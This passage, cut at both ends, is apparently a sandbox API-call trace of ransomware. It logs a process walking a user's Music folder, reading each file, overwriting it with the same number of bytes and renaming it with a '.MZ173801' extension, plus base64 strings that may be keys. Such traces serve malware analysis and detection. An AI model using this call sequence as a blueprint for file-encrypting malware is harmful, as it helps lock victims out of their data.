lpLocalFileTime=0x19fa5c) returned 1 [0116.342] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.342] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd66ab930, ftCreationTime.dwHighDateTime=0x1d5ed51, ftLastAccessTime.dwLowDateTime=0x35dba9f0, ftLastAccessTime.dwHighDateTime=0x1d5e407, ftLastWriteTime.dwLowDateTime=0xa5cf2f26, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5926, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="uIWVa_KOKpq1AQ.gif.MZ173801", cAlternateFileName="UIWVA_~1.MZ1")) returned 1 [0116.342] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.342] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.342] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bad1db0, ftCreationTime.dwHighDateTime=0x1d5ebf6, ftLastAccessTime.dwLowDateTime=0x6f5623b0, ftLastAccessTime.dwHighDateTime=0x1d5ed15, ftLastWriteTime.dwLowDateTime=0xa5cf2f26, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x7a7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="uoWC-.jpg.MZ173801", cAlternateFileName="UOWC-J~1.MZ1")) returned 1 [0116.342] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.342] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.342] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bad1db0, ftCreationTime.dwHighDateTime=0x1d5ebf6, ftLastAccessTime.dwLowDateTime=0x6f5623b0, ftLastAccessTime.dwHighDateTime=0x1d5ed15, ftLastWriteTime.dwLowDateTime=0xa5cf2f26, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x7a7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="uoWC-.jpg.MZ173801", cAlternateFileName="UOWC-J~1.MZ1")) returned 0 [0116.343] GetLastError () returned 0x12 [0116.343] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0116.343] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=13, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Music") returned 1 [0116.345] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0116.345] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x19fb48, csidl=13, fCreate=0 | out: pszPath="C:\\Users\\FD1HVy\\Music") returned 1 [0116.345] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe51bed64, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe51bed64, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0116.345] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe51bed64, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe51bed64, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.345] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e2216c0, ftCreationTime.dwHighDateTime=0x1d5eca9, ftLastAccessTime.dwLowDateTime=0x42662c70, ftLastAccessTime.dwHighDateTime=0x1d5ee59, ftLastWriteTime.dwLowDateTime=0x42662c70, ftLastWriteTime.dwHighDateTime=0x1d5ee59, nFileSizeHigh=0x0, nFileSizeLow=0x101e2, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="5luLU8SfxcLf3.mp3", cAlternateFileName="5LULU8~1.MP3")) returned 1 [0116.345] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0116.345] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.345] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\5luLU8SfxcLf3.mp3" (normalized: "c:\\users\\fd1hvy\\music\\5lulu8sfxclf3.mp3"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e2216c0, ftCreationTime.dwHighDateTime=0x1d5eca9, ftLastAccessTime.dwLowDateTime=0x42662c70, ftLastAccessTime.dwHighDateTime=0x1d5ee59, ftLastWriteTime.dwLowDateTime=0x42662c70, ftLastWriteTime.dwHighDateTime=0x1d5ee59, nFileSizeHigh=0x0, nFileSizeLow=0x101e2)) returned 1 [0116.346] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.346] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.346] GetCurrentThreadId () returned 0x1358 [0116.346] GetCurrentThreadId () returned 0x1358 [0116.346] GetCurrentThreadId () returned 0x1358 [0116.346] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.346] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.347] GetCurrentThreadId () returned 0x1358 [0116.347] GetCurrentThreadId () returned 0x1358 [0116.347] GetCurrentThreadId () returned 0x1358 [0116.347] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\5luLU8SfxcLf3.mp3" (normalized: "c:\\users\\fd1hvy\\music\\5lulu8sfxclf3.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f0 [0116.347] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0116.347] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0116.347] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x101e2 [0116.347] SetFilePointer (in: hFile=0x3f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0116.347] ReadFile (in: hFile=0x3f0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x101e2, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x101e2, lpOverlapped=0x0) returned 1 [0116.348] CloseHandle (hObject=0x3f0) returned 1 [0116.349] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\5luLU8SfxcLf3.mp3" (normalized: "c:\\users\\fd1hvy\\music\\5lulu8sfxclf3.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f0 [0116.351] WriteFile (in: hFile=0x3f0, lpBuffer=0x23c2ad0*, nNumberOfBytesToWrite=0x101e2, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23c2ad0*, lpNumberOfBytesWritten=0x19f9bc*=0x101e2, lpOverlapped=0x0) returned 1 [0116.352] CloseHandle (hObject=0x3f0) returned 1 [0116.355] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\5luLU8SfxcLf3.mp3" (normalized: "c:\\users\\fd1hvy\\music\\5lulu8sfxclf3.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\5luLU8SfxcLf3.mp3.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\5lulu8sfxclf3.mp3.mz173801")) returned 1 [0116.355] GetCurrentThreadId () returned 0x1358 [0116.355] GetCurrentThreadId () returned 0x1358 [0116.356] GetCurrentThreadId () returned 0x1358 [0116.356] GetCurrentThreadId () returned 0x1358 [0116.356] GetCurrentThreadId () returned 0x1358 [0116.356] GetCurrentThreadId () returned 0x1358 [0116.356] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a017930, ftCreationTime.dwHighDateTime=0x1d5e3f6, ftLastAccessTime.dwLowDateTime=0x458c4710, ftLastAccessTime.dwHighDateTime=0x1d5e934, ftLastWriteTime.dwLowDateTime=0x458c4710, ftLastWriteTime.dwHighDateTime=0x1d5e934, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="5xR3", cAlternateFileName="")) returned 1 [0116.356] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61fecef0, ftCreationTime.dwHighDateTime=0x1d5ef32, ftLastAccessTime.dwLowDateTime=0xf9265b60, ftLastAccessTime.dwHighDateTime=0x1d5eaad, ftLastWriteTime.dwLowDateTime=0xf9265b60, ftLastWriteTime.dwHighDateTime=0x1d5eaad, nFileSizeHigh=0x0, nFileSizeLow=0x60f8, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="6o05.mp3", cAlternateFileName="")) returned 1 [0116.356] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0116.356] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0116.356] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\6o05.mp3" (normalized: "c:\\users\\fd1hvy\\music\\6o05.mp3"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61fecef0, ftCreationTime.dwHighDateTime=0x1d5ef32, ftLastAccessTime.dwLowDateTime=0xf9265b60, ftLastAccessTime.dwHighDateTime=0x1d5eaad, ftLastWriteTime.dwLowDateTime=0xf9265b60, ftLastWriteTime.dwHighDateTime=0x1d5eaad, nFileSizeHigh=0x0, nFileSizeLow=0x60f8)) returned 1 [0116.357] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.357] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.357] GetCurrentThreadId () returned 0x1358 [0116.357] GetCurrentThreadId () returned 0x1358 [0116.357] GetCurrentThreadId () returned 0x1358 [0116.358] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 